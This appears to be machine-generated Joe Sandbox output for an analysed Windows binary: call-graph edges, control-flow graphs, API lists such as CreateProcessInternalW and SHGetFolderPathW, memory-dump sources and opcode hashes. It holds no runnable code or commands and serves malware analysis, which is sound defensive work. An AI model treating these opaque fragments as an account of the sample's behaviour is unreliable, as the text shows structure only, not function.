32443->32439 32454 7ff650236e20 17 API calls 32443->32454 32456 7ff650234879 32445->32456 32446->32430 32480 7ff650234396 32446->32480 32447->32436 32449 7ff650234297 32447->32449 32448->32466 32449->32429 32453 7ff650236e20 17 API calls 32449->32453 32450->32438 32451->32439 32458 7ff650234813 32453->32458 32454->32439 32460 7ff650236e20 17 API calls 32455->32460 32475 7ff650233fa9 32455->32475 32456->32424 32461 7ff650236e20 17 API calls 32456->32461 32457 7ff6502342cb 32457->32264 32458->32429 32463 7ff650234824 32458->32463 32459->32440 32467 7ff650234761 32460->32467 32461->32424 32462->32434 32463->32431 32470 7ff650236e20 17 API calls 32463->32470 32464->32446 32469 7ff650236e20 17 API calls 32464->32469 32465 7ff650233fb8 realloc 32465->32464 32468 7ff650233fcf 32465->32468 32521 7ff6502381d0 93 API calls 32466->32521 32467->32429 32472 7ff650236e20 17 API calls 32467->32472 32467->32475 32473 7ff650236e20 17 API calls 32468->32473 32477 7ff650233fd8 32468->32477 32471 7ff6502348ee 32469->32471 32470->32431 32471->32430 32474 7ff6502348ff 32471->32474 32472->32475 32476 7ff65023479a 32473->32476 32478 7ff650236e20 17 API calls 32474->32478 32474->32480 32475->32429 32475->32465 32476->32429 32476->32477 32483 7ff650236e20 17 API calls 32476->32483 32477->32429 32479 7ff650234005 memset 32477->32479 32478->32480 32481 7ff650234731 32479->32481 32482 7ff65023401e 32479->32482 32522 7ff6502381d0 93 API calls 32480->32522 32484 7ff650236e20 17 API calls 32481->32484 32482->32429 32489 7ff650236e20 17 API calls 32482->32489 32485 7ff6502347b6 32483->32485 32487 7ff650234736 32484->32487 32485->32477 32490 7ff650236e20 17 API calls 32485->32490 32488 7ff650236e20 17 API calls 32486->32488 32487->32429 32487->32482 32493 7ff650236e20 17 API calls 32487->32493 32488->32455 32491 7ff650234617 32489->32491 32492 7ff6502347da 32490->32492 32491->32429 32494 7ff650236e20 17 API calls 32491->32494 32492->32429 32492->32477 32495 7ff650236e20 17 API calls 32492->32495 32493->32482 32496 7ff650234633 32494->32496 32495->32477 32496->32429 32497 7ff650236e20 17 API calls 32496->32497 32498 7ff65023464b 32497->32498 32498->32429 32499 7ff650236e20 17 API calls 32498->32499 32500 7ff65023466a 32499->32500 32500->32429 32501 7ff650236e20 17 API calls 32500->32501 32502 7ff650234689 32501->32502 32502->32429 32503 7ff650236e20 17 API calls 32502->32503 32504 7ff6502346a8 32503->32504 32504->32429 32505 7ff650236e20 17 API calls 32504->32505 32506 7ff6502346c4 32505->32506 32506->32429 32507 7ff6502346d5 32506->32507 32507->32441 32508 7ff650236e20 17 API calls 32507->32508 32509 7ff6502346e3 32508->32509 32510 7ff6502346f8 32509->32510 32511 7ff6502348a4 32509->32511 32510->32441 32513 7ff650236e20 17 API calls 32510->32513 32511->32431 32512 7ff650236e20 17 API calls 32511->32512 32514 7ff6502348b2 32512->32514 32515 7ff650234706 32513->32515 32514->32431 32518 7ff650236e20 17 API calls 32514->32518 32515->32441 32516 7ff650234717 32515->32516 32516->32431 32517 7ff650236e20 17 API calls 32516->32517 32517->32431 32518->32431 32519->32419 32520->32419 32521->32457 32522->32457 32524 7ff65025176b 32523->32524 32525 7ff6502517a8 32523->32525 32530 7ff65024a550 32524->32530 32552 7ff650242ab0 124 API calls 32525->32552 32527 7ff6502517b0 32527->32524 32553 7ff6502510a0 32527->32553 32531 7ff65024a578 strlen 32530->32531 32532 7ff65024a584 32530->32532 32531->32532 32587 7ff650246940 32532->32587 32535 7ff650251f10 32613 7ff650251af0 32535->32613 32541 7ff650251f4b 32542 7ff6502510a0 124 API calls 32541->32542 32543 7ff650251f58 32542->32543 32652 7ff65022fa00 32543->32652 32546 7ff650251aa0 32547 7ff650251ad0 32546->32547 32548 7ff650251ab7 32546->32548 32548->32547 32680 7ff650242960 32548->32680 32551 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32552->32527 32577 7ff650250dd0 32553->32577 32555 7ff6502510a9 32584 7ff6502421c0 124 API calls 32555->32584 32578 7ff650250e00 32577->32578 32581 7ff650250de4 32577->32581 32585 7ff65022f600 17 API calls 32578->32585 32580 7ff650250e05 32580->32581 32586 7ff65022f600 17 API calls 32580->32586 32581->32555 32583 7ff650250e19 32583->32581 32585->32580 32586->32583 32588 7ff650246958 32587->32588 32589 7ff650246953 32587->32589 32597 7ff650246e80 32588->32597 32589->32588 32590 7ff6502469ba 32589->32590 32609 7ff650252150 124 API calls 32590->32609 32592 7ff650246965 32594 7ff650246977 32592->32594 32596 7ff650246998 memcpy 32592->32596 32594->32535 32596->32594 32598 7ff650246e97 32597->32598 32599 7ff650246f0e 32597->32599 32601 7ff650246eb9 32598->32601 32604 7ff650246f09 32598->32604 32600 7ff650252240 124 API calls 32599->32600 32602 7ff650246f1a 32600->32602 32610 7ff650251670 124 API calls 32601->32610 32605 7ff650246f3b 32602->32605 32612 7ff650248330 124 API calls 32602->32612 32611 7ff650252090 124 API calls 32604->32611 32605->32592 32606 7ff650246ee9 32606->32592 32610->32606 32612->32605 32614 7ff650251b0a 32613->32614 32615 7ff650251c18 32613->32615 32618 7ff650251b22 32614->32618 32620 7ff650251b48 32614->32620 32663 7ff65022f600 17 API calls 32615->32663 32617 7ff650251c1d 32617->32614 32617->32620 32664 7ff65022f600 17 API calls 32617->32664 32619 7ff650251b2b 32618->32619 32629 7ff650251c70 32618->32629 32646 7ff650251e30 32619->32646 32620->32619 32622 7ff650235020 56 API calls 32620->32622 32624 7ff650251b5e 32622->32624 32623 7ff650251c75 32623->32619 32668 7ff65022f600 17 API calls 32623->32668 32624->32619 32626 7ff650251b66 malloc 32624->32626 32632 7ff650251b7c 32626->32632 32640 7ff650251ba1 32626->32640 32627 7ff650251c35 32628 7ff650251c3f 32627->32628 32627->32629 32628->32620 32665 7ff65022f600 17 API calls 32628->32665 32629->32618 32667 7ff65022f600 17 API calls 32629->32667 32630 7ff6502510a0 123 API calls 32633 7ff650251cef 32630->32633 32635 7ff650251b93 32632->32635 32641 7ff650251cd7 32632->32641 32669 7ff65022f600 17 API calls 32632->32669 32634 7ff650251c91 32634->32619 32662 7ff650235090 59 API calls 32635->32662 32639 7ff650251c50 32639->32620 32666 7ff65022f600 17 API calls 32639->32666 32640->32630 32642 7ff650251ba9 32640->32642 32641->32635 32670 7ff65022f600 17 API calls 32641->32670 32642->32619 32645 7ff650251c68 32645->32620 32671 7ff650250eb0 32646->32671 32648 7ff650251e55 32649 7ff650250dd0 17 API calls 32648->32649 32650 7ff650251e5e 32649->32650 32651 7ff65022fc20 RaiseException 32650->32651 32651->32541 32653 7ff65022faea 32652->32653 32657 7ff65022fa23 32652->32657 32653->32546 32654 7ff65022fae0 32654->32653 32655 7ff65022fbf7 RtlUnwindEx abort 32654->32655 32656 7ff65022fa7d 32656->32653 32658 7ff65022fad9 abort 32656->32658 32659 7ff65022faa9 RaiseException 32656->32659 32657->32653 32657->32654 32657->32656 32660 7ff65022fb50 32657->32660 32658->32654 32659->32658 32660->32653 32660->32658 32661 7ff65022fbaa RtlUnwindEx 32660->32661 32661->32658 32662->32640 32663->32617 32664->32627 32665->32639 32666->32645 32667->32623 32668->32634 32669->32632 32670->32635 32672 7ff650250ee0 32671->32672 32674 7ff650250ec4 32671->32674 32678 7ff65022f600 17 API calls 32672->32678 32674->32648 32675 7ff650250ee5 32675->32674 32679 7ff65022f600 17 API calls 32675->32679 32677 7ff650250efc 32677->32674 32678->32675 32679->32677 32681 7ff6502302a0 11 API calls 32680->32681 32682 7ff650242974 32681->32682 32683 7ff650242a7a 32682->32683 32688 7ff65024297c 32682->32688 32711 7ff650243340 124 API calls 32683->32711 32685 7ff650242a1f 32686 7ff650251750 124 API calls 32685->32686 32691 7ff650242a23 32685->32691 32689 7ff650242a89 32686->32689 32687 7ff6502305c0 3 API calls 32687->32685 32688->32687 32690 7ff650251f10 124 API calls 32689->32690 32692 7ff650242aa9 32690->32692 32691->32551 32712 7ff65022fc80 RtlCaptureContext RtlUnwindEx abort 32692->32712 32711->32685 32714 7ff650249ee8 strlen 32713->32714 32715 7ff650249ef4 32713->32715 32714->32715 32716 7ff650246940 123 API calls 32715->32716 32717 7ff650249f01 32716->32717 32717->32313 32720 7ff6502216d6 GetTickCount64 32719->32720 32721 7ff650224b72 32720->32721 32722 7ff650224b81 32721->32722 32722->32146 32724 7ff650221725 32723->32724 32732 7ff650222f9a 32723->32732 32724->32150 32725 7ff65022313e _stricmp 32725->32732 32726 7ff650223054 _stricmp 32726->32732 32727 7ff65022fff0 74 API calls 32727->32732 32728 7ff650223348 strcmp 32728->32732 32729 7ff6502233fa strcmp 32729->32732 32730 7ff6502234a1 strcmp 32730->32732 32731 7ff650223551 strcmp 32731->32732 32732->32724 32732->32725 32732->32726 32732->32727 32732->32728 32732->32729 32732->32730 32732->32731 32732->32732 32733 7ff6502235f4 strcmp 32732->32733 32734 7ff650223674 strcmp 32732->32734 32733->32732 32734->32732 32736 7ff65022f440 32735->32736 32737 7ff65022266f memset 32736->32737 32769 7ff650239fe0 32737->32769 32739 7ff6502226c4 CreateProcessInternalW 32740 7ff650222766 32739->32740 32740->32155 32778 7ff650223790 32741->32778 32743 7ff650224197 32744 7ff650224230 32743->32744 32745 7ff6502241a4 GetFileSize GetProcessHeap HeapAlloc 32743->32745 32744->32189 32746 7ff650224214 32745->32746 32746->32189 32821 7ff650223dc0 wcslen 32747->32821 32751 7ff65022427e 32751->32192 32753 7ff65022fff0 74 API calls 32752->32753 32754 7ff6502215f8 32753->32754 32755 7ff65022fff0 74 API calls 32754->32755 32756 7ff650221607 32755->32756 32757 7ff650221679 malloc 32756->32757 32758 7ff650221691 32757->32758 32758->32194 32758->32758 32760 7ff650222f23 32759->32760 32761 7ff650222ef3 GetLastError 32759->32761 32760->32197 32761->32760 32858 7ff6502242f0 32763->32858 32765 7ff6502246bc 32767 7ff6502246c9 32765->32767 32861 7ff6502225b0 CreateProcessInternalW 32765->32861 32767->32204 32768->32223 32770 7ff65023a030 32769->32770 32771 7ff650239fef 32769->32771 32777 7ff65023e270 fputwc fputwc fputwc fwprintf fwprintf 32770->32777 32776 7ff65023e270 fputwc fputwc fputwc fwprintf fwprintf 32771->32776 32774 7ff65023a045 32774->32739 32775 7ff65023a008 32775->32739 32776->32775 32777->32774 32779 7ff6502239d8 32778->32779 32782 7ff6502237c5 32778->32782 32818 7ff650252150 124 API calls 32779->32818 32781 7ff6502239e4 32819 7ff65024fc60 124 API calls 32781->32819 32782->32781 32785 7ff6502239b8 memcpy 32782->32785 32786 7ff650223801 wcslen 32782->32786 32784 7ff650223a08 32785->32779 32791 7ff65024dca0 32786->32791 32788 7ff650223897 wcslen 32790 7ff65022393f 32788->32790 32789 7ff650223836 32789->32784 32789->32788 32790->32743 32792 7ff65024dcdb 32791->32792 32793 7ff65024df8e 32791->32793 32795 7ff65024de80 32792->32795 32797 7ff65024dd05 32792->32797 32809 7ff65024ddfb 32792->32809 32794 7ff650252240 124 API calls 32793->32794 32798 7ff65024df9a 32794->32798 32820 7ff65024fce0 127 API calls 32795->32820 32799 7ff65024ddad 32797->32799 32801 7ff65024dd23 32797->32801 32798->32789 32805 7ff65024ddc9 memcpy 32799->32805 32799->32809 32800 7ff65024dd58 32804 7ff65024dd67 memcpy 32800->32804 32812 7ff65024dd76 32800->32812 32801->32800 32803 7ff65024dd3a memcpy 32801->32803 32802 7ff65024de2b 32807 7ff65024dee8 32802->32807 32808 7ff65024de49 32802->32808 32802->32812 32803->32800 32804->32812 32805->32809 32805->32812 32806 7ff65024de12 memcpy 32806->32802 32807->32812 32814 7ff65024def7 memcpy 32807->32814 32810 7ff65024de52 32808->32810 32811 7ff65024df20 32808->32811 32809->32802 32809->32806 32810->32812 32815 7ff65024de69 memcpy 32810->32815 32813 7ff65024df45 32811->32813 32816 7ff65024df37 memcpy 32811->32816 32812->32789 32813->32812 32817 7ff65024df5f memcpy 32813->32817 32814->32812 32815->32812 32816->32813 32817->32812 32819->32784 32820->32812 32825 7ff650223df0 32821->32825 32822 7ff650223e09 wcscpy 32840 7ff650223a90 32822->32840 32824 7ff650223e3c 32826 7ff650223e50 32824->32826 32825->32822 32825->32824 32827 7ff650223e81 wcslen 32826->32827 32828 7ff6502240c0 32826->32828 32829 7ff6502240cc 32827->32829 32830 7ff650223ea2 32827->32830 32856 7ff650252150 124 API calls 32828->32856 32857 7ff65024fc60 124 API calls 32829->32857 32830->32829 32833 7ff6502240a0 memcpy 32830->32833 32834 7ff650223ec0 wcslen 32830->32834 32833->32828 32836 7ff65024dca0 135 API calls 32834->32836 32835 7ff6502240f3 32838 7ff650223ef5 32836->32838 32837 7ff650223f65 wcslen 32839 7ff65022405b 32837->32839 32838->32835 32838->32837 32839->32751 32841 7ff650223ac1 wcslen 32840->32841 32842 7ff650223d00 32840->32842 32844 7ff650223d0c 32841->32844 32845 7ff650223ae2 32841->32845 32854 7ff650252150 124 API calls 32842->32854 32855 7ff65024fc60 124 API calls 32844->32855 32845->32844 32847 7ff650223ce0 memcpy 32845->32847 32848 7ff650223b00 wcslen 32845->32848 32847->32842 32850 7ff65024dca0 135 API calls 32848->32850 32849 7ff650223d33 32852 7ff650223b35 32850->32852 32851 7ff650223ba5 wcslen 32853 7ff650223c9b 32851->32853 32852->32849 32852->32851 32853->32825 32855->32849 32857->32835 32859 7ff650223790 138 API calls 32858->32859 32860 7ff650224309 32859->32860 32860->32765 32861->32767

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 267 7ff650222f30-7ff650222f94 268 7ff650222f9a-7ff650222fd3 267->268 269 7ff6502236ae-7ff6502236f5 267->269 270 7ff65022308f-7ff6502230a3 268->270 271 7ff650223070-7ff650223089 270->271 272 7ff6502230a5-7ff6502230a8 270->272 271->269 271->270 272->271 273 7ff6502230aa-7ff6502230b5 call 7ff65022fff0 272->273 275 7ff6502230ba-7ff6502230d2 call 7ff65022fff0 273->275 278 7ff650223109-7ff65022310f 275->278 279 7ff6502230d4-7ff650223104 call 7ff65022ed00 275->279 281 7ff65022313e-7ff65022314b _stricmp 278->281 282 7ff650223111-7ff650223138 278->282 279->278 283 7ff650222fd8-7ff650222ff9 call 7ff65022fff0 * 2 281->283 284 7ff650223151-7ff650223271 call 7ff65022fff0 * 12 281->284 282->281 293 7ff650222ffb-7ff650223028 call 7ff65022ed00 283->293 294 7ff65022302d-7ff650223033 283->294 319 7ff650223278-7ff6502232cf 284->319 293->294 297 7ff650223035-7ff65022304e 294->297 298 7ff650223054-7ff650223061 _stricmp 294->298 297->298 298->284 300 7ff650223067 298->300 300->271 320 7ff6502232d1-7ff65022330b call 7ff65022ed00 319->320 321 7ff650223310-7ff650223314 319->321 320->321 323 7ff650223316-7ff650223318 321->323 324 7ff650223348-7ff650223355 strcmp 321->324 325 7ff650223320-7ff650223342 323->325 326 7ff650223357 324->326 327 7ff65022335e-7ff650223389 324->327 325->325 328 7ff650223344 325->328 326->327 329 7ff65022338b-7ff6502233be call 7ff65022ed00 327->329 330 7ff6502233c3-7ff6502233c7 327->330 328->324 329->330 332 7ff6502233c9-7ff6502233d5 330->332 333 7ff6502233fa-7ff650223407 strcmp 330->333 336 7ff6502233d8-7ff6502233f4 332->336 334 7ff650223409 333->334 335 7ff650223410-7ff650223436 333->335 334->335 337 7ff650223438-7ff650223469 call 7ff65022ed00 335->337 338 7ff65022346e-7ff650223472 335->338 336->336 339 7ff6502233f6 336->339 337->338 341 7ff6502234a1-7ff6502234ae strcmp 338->341 342 7ff650223474-7ff65022347e 338->342 339->333 344 7ff6502234b7-7ff6502234dc 341->344 345 7ff6502234b0 341->345 343 7ff650223480-7ff65022349b 342->343 343->343 346 7ff65022349d 343->346 347 7ff6502234de-7ff65022350f call 7ff65022ed00 344->347 348 7ff650223514-7ff650223518 344->348 345->344 346->341 347->348 350 7ff65022351a-7ff650223526 348->350 351 7ff650223551-7ff65022355e strcmp 348->351 352 7ff650223530-7ff65022354b 350->352 353 7ff650223567-7ff650223582 351->353 354 7ff650223560 351->354 352->352 355 7ff65022354d 352->355 356 7ff6502235b7-7ff6502235bd 353->356 357 7ff650223584-7ff6502235b2 call 7ff65022ed00 353->357 354->353 355->351 359 7ff6502235bf-7ff6502235cb 356->359 360 7ff6502235f4-7ff650223601 strcmp 356->360 357->356 361 7ff6502235d0-7ff6502235ec 359->361 362 7ff65022360a-7ff650223612 360->362 363 7ff650223603 360->363 361->361 364 7ff6502235ee 361->364 365 7ff650223645-7ff65022364a 362->365 366 7ff650223614-7ff650223640 call 7ff65022ed00 362->366 363->362 364->360 367 7ff65022364c-7ff65022366f 365->367 368 7ff650223674-7ff650223681 strcmp 365->368 366->365 367->368 370 7ff65022368a-7ff65022369e 368->370 371 7ff650223683 368->371 370->271 372 7ff6502236a4-7ff6502236a9 370->372 371->370 372->319
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: strcmp$_stricmp
                                                                    • String ID: KF $y$}
                                                                    • API String ID: 3398372305-1747734038
                                                                    • Opcode ID: 13ef81c63967c5c04ea5b67463ae1f840b2fdf113d5fa974f652ee7e296297f5
                                                                    • Instruction ID: b9e432087aa2aeb0355574a203c4ad5fbc56911daa2a4975e857d752d431c454
                                                                    • Opcode Fuzzy Hash: 13ef81c63967c5c04ea5b67463ae1f840b2fdf113d5fa974f652ee7e296297f5
                                                                    • Instruction Fuzzy Hash: 4A22A032A18BC3A5EB21CB69E9053AA7BA4FF55784F485131DA8C93B96EF3CD145C700

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 390 7ff6502216c0-7ff650221706 call 7ff65022f440 GetTickCount64 call 7ff650224b72 GetTickCount64 395 7ff650221708-7ff65022171d 390->395 396 7ff650221720-7ff650221803 call 7ff650222f30 call 7ff65022fff0 * 2 390->396 403 7ff650221809-7ff6502218c5 call 7ff65022ed00 396->403 404 7ff6502218ca-7ff6502218d3 396->404 403->404 405 7ff650221910-7ff650221958 call 7ff650222660 call 7ff65022fff0 * 2 404->405 406 7ff6502218d5-7ff6502218e1 404->406 416 7ff65022195a-7ff6502219af call 7ff65022ed00 405->416 417 7ff6502219b4-7ff6502219bd 405->417 408 7ff6502218e8-7ff650221905 406->408 408->408 410 7ff650221907 408->410 410->405 416->417 419 7ff6502219fa-7ff650221a3d call 7ff650222660 call 7ff65022fff0 * 2 417->419 420 7ff6502219bf-7ff6502219cb 417->420 429 7ff650221a99-7ff650221aa2 419->429 430 7ff650221a3f-7ff650221a94 call 7ff65022ed00 419->430 422 7ff6502219d0-7ff6502219ef 420->422 422->422 423 7ff6502219f1 422->423 423->419 432 7ff650221ada-7ff650221bc8 call 7ff650222660 SHGetFolderPathW GetModuleFileNameW SHGetFolderPathW call 7ff65022fff0 * 2 429->432 433 7ff650221aa4-7ff650221aae 429->433 430->429 442 7ff650221bca-7ff650221c09 call 7ff65022ed00 432->442 443 7ff650221c0e-7ff650221c13 432->443 434 7ff650221ab0-7ff650221acf 433->434 434->434 437 7ff650221ad1 434->437 437->432 442->443 445 7ff650221c4c-7ff650221c91 wcscat call 7ff65022fff0 * 2 443->445 446 7ff650221c15-7ff650221c21 443->446 453 7ff650221cea-7ff650221cf2 445->453 454 7ff650221c93-7ff650221ce5 call 7ff65022ed00 445->454 447 7ff650221c28-7ff650221c45 446->447 447->447 449 7ff650221c47 447->449 449->445 456 7ff650221d29-7ff650221d99 call 7ff650222660 call 7ff65022fff0 * 2 453->456 457 7ff650221cf4-7ff650221cfe 453->457 454->453 466 7ff650221d9b-7ff650221dc9 call 7ff65022ed00 456->466 467 7ff650221dce-7ff650221dd3 456->467 458 7ff650221d00-7ff650221d1f 457->458 458->458 460 7ff650221d21 458->460 460->456 466->467 468 7ff650221df9-7ff650221e14 call 7ff650223700 _wcsicmp 467->468 469 7ff650221dd5-7ff650221df4 467->469 473 7ff65022242b-7ff650222479 call 7ff650224180 call 7ff650224260 call 7ff6502215c0 call 7ff650222ee0 468->473 474 7ff650221e1a-7ff650221e81 call 7ff65022fff0 * 2 468->474 469->468 495 7ff65022258a-7ff65022259e call 7ff650224640 call 7ff650224acd 473->495 496 7ff65022247f-7ff6502224b8 call 7ff65022fff0 * 2 473->496 483 7ff650221e83-7ff650221eb0 call 7ff65022ed00 474->483 484 7ff650221eb5-7ff650221eb9 474->484 483->484 487 7ff650221ebb-7ff650221ee0 484->487 488 7ff650221ee4-7ff650221f62 call 7ff650223700 call 7ff6502215c0 call 7ff65022fff0 * 2 484->488 487->488 512 7ff650221fa7-7ff650221fac 488->512 513 7ff650221f64-7ff650221fa2 call 7ff65022ed00 488->513 508 7ff6502225a3 495->508 510 7ff6502224ba-7ff650222510 call 7ff65022ed00 496->510 511 7ff650222515-7ff65022251e 496->511 508->508 510->511 515 7ff65022255a-7ff650222562 call 7ff650222660 511->515 516 7ff650222520-7ff65022252c 511->516 518 7ff650221fae-7ff650221fba 512->518 519 7ff650221fe5-7ff650221fef call 7ff650222ee0 512->519 513->512 525 7ff650222567 515->525 520 7ff650222530-7ff65022254f 516->520 522 7ff650221fc0-7ff650221fde 518->522 528 7ff65022256c-7ff650222585 call 7ff650224640 call 7ff650224acd 519->528 529 7ff650221ff5-7ff650222070 SHGetFolderPathW call 7ff65022fff0 * 2 519->529 520->520 523 7ff650222551 520->523 522->522 526 7ff650221fe0 522->526 523->515 525->528 526->519 528->495 538 7ff6502220a2-7ff6502220a8 529->538 539 7ff650222072-7ff65022209d call 7ff65022ed00 529->539 541 7ff6502220db-7ff650222113 wcscat call 7ff650222790 call 7ff65022fff0 * 2 538->541 542 7ff6502220aa-7ff6502220d5 538->542 539->538 549 7ff65022213b-7ff650222140 541->549 550 7ff650222115-7ff650222136 call 7ff65022ed00 541->550 542->541 552 7ff65022215d-7ff6502221ae call 7ff65022fff0 * 2 549->552 553 7ff650222142-7ff650222158 549->553 550->549 558 7ff6502221ef-7ff6502221f4 552->558 559 7ff6502221b0-7ff6502221ea call 7ff65022ed00 552->559 553->552 561 7ff6502221f6-7ff650222202 558->561 562 7ff65022222d-7ff650222266 call 7ff65022fff0 * 2 558->562 559->558 563 7ff650222208-7ff650222226 561->563 569 7ff650222268-7ff6502222bc call 7ff65022ed00 562->569 570 7ff6502222c1-7ff6502222c8 562->570 563->563 566 7ff650222228 563->566 566->562 569->570 572 7ff650222307-7ff650222328 call 7ff65022fff0 * 2 570->572 573 7ff6502222ca-7ff6502222df 570->573 582 7ff6502223dd-7ff650222401 call 7ff65022ed00 572->582 583 7ff65022232e 572->583 574 7ff6502222e0-7ff6502222e7 573->574 576 7ff6502222e9-7ff6502222ed 574->576 577 7ff6502222f0-7ff6502222fe 574->577 576->577 577->574 579 7ff650222300 577->579 579->572 584 7ff650222330-7ff650222336 582->584 583->584 586 7ff650222356-7ff650222366 _wcsicmp 584->586 587 7ff650222338-7ff650222350 584->587 589 7ff650222368-7ff65022236d 586->589 590 7ff650222373-7ff650222394 memset call 7ff650223700 586->590 587->586 589->395 589->590 593 7ff650222396-7ff6502223ac call 7ff6502215c0 590->593 594 7ff650222410-7ff650222429 call 7ff6502215c0 590->594 599 7ff6502223af-7ff6502223b9 call 7ff650222ee0 593->599 594->599 599->395 602 7ff6502223bf-7ff6502223d8 call 7ff650224640 call 7ff650224acd 599->602 602->395
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Count64Tick
                                                                    • String ID:
                                                                    • API String ID: 1927824332-0
                                                                    • Opcode ID: b4f3fe240c14dbf4906e9ed1916a183c68da1a0d21a8ea7e6a5a99d43bf79f11
                                                                    • Instruction ID: 59df070b20c020bbcc287f37edc3b698419502012b05ccbd53f249cc4a2d49ea
                                                                    • Opcode Fuzzy Hash: b4f3fe240c14dbf4906e9ed1916a183c68da1a0d21a8ea7e6a5a99d43bf79f11
                                                                    • Instruction Fuzzy Hash: D6820431A187C3A1FB218B69E9057BA7BA0FB95784F484231DE8CA7B95EF2DD145C700

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 786 7ff650221190-7ff6502211be 787 7ff65022148b-7ff65022148e GetStartupInfoW 786->787 788 7ff6502211c4-7ff6502211e1 786->788 790 7ff650221499-7ff6502214b3 call 7ff650241540 787->790 789 7ff6502211f9-7ff650221204 788->789 791 7ff650221206-7ff650221214 789->791 792 7ff6502211e8-7ff6502211eb 789->792 796 7ff65022144b-7ff65022145a call 7ff650241558 791->796 797 7ff65022121a-7ff65022121e 791->797 794 7ff6502211f1-7ff6502211f6 Sleep 792->794 795 7ff650221434-7ff650221445 792->795 794->789 795->796 795->797 804 7ff650221239-7ff65022123b 796->804 805 7ff650221460-7ff65022147b _initterm 796->805 800 7ff6502214b4-7ff6502214cd call 7ff650241520 797->800 801 7ff650221224-7ff650221233 797->801 812 7ff6502214d2-7ff6502214d4 call 7ff6502414c0 800->812 801->804 801->805 807 7ff650221481-7ff650221486 804->807 808 7ff650221241-7ff65022124e 804->808 805->807 805->808 807->808 809 7ff65022125c-7ff6502212a4 call 7ff65022e5f0 SetUnhandledExceptionFilter call 7ff650241b40 call 7ff65022e400 call 7ff650241c30 808->809 810 7ff650221250-7ff650221258 808->810 822 7ff6502212a6 809->822 823 7ff6502212c3-7ff6502212ca 809->823 810->809 816 7ff6502214d9-7ff6502214da 812->816 824 7ff650221308-7ff65022130e 822->824 825 7ff6502212cc-7ff6502212db 823->825 826 7ff6502212b0-7ff6502212b3 823->826 827 7ff650221326-7ff65022134e malloc 824->827 828 7ff650221310-7ff65022131a 824->828 831 7ff6502212bf 825->831 829 7ff6502212dd-7ff6502212e4 826->829 830 7ff6502212b5-7ff6502212b8 826->830 836 7ff6502213ab-7ff6502213df call 7ff65022e1f0 call 7ff6502216c0 827->836 837 7ff650221350-7ff650221352 827->837 834 7ff65022142a 828->834 835 7ff650221320 828->835 832 7ff6502212e6 829->832 833 7ff650221301 829->833 830->829 838 7ff6502212ba 830->838 831->823 839 7ff6502212f0-7ff6502212ff 832->839 833->824 834->795 835->827 848 7ff6502213e4-7ff6502213f2 836->848 840 7ff650221358-7ff650221360 837->840 838->831 839->833 839->839 843 7ff650221366-7ff65022136c 840->843 844 7ff650221420-7ff650221425 840->844 847 7ff650221370-7ff65022137b 843->847 846 7ff650221381-7ff6502213a4 malloc memcpy 844->846 846->840 850 7ff6502213a6 846->850 847->847 849 7ff65022137d 847->849 848->812 851 7ff6502213f8-7ff650221400 848->851 849->846 850->836 851->790 852 7ff650221406-7ff650221415 851->852
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
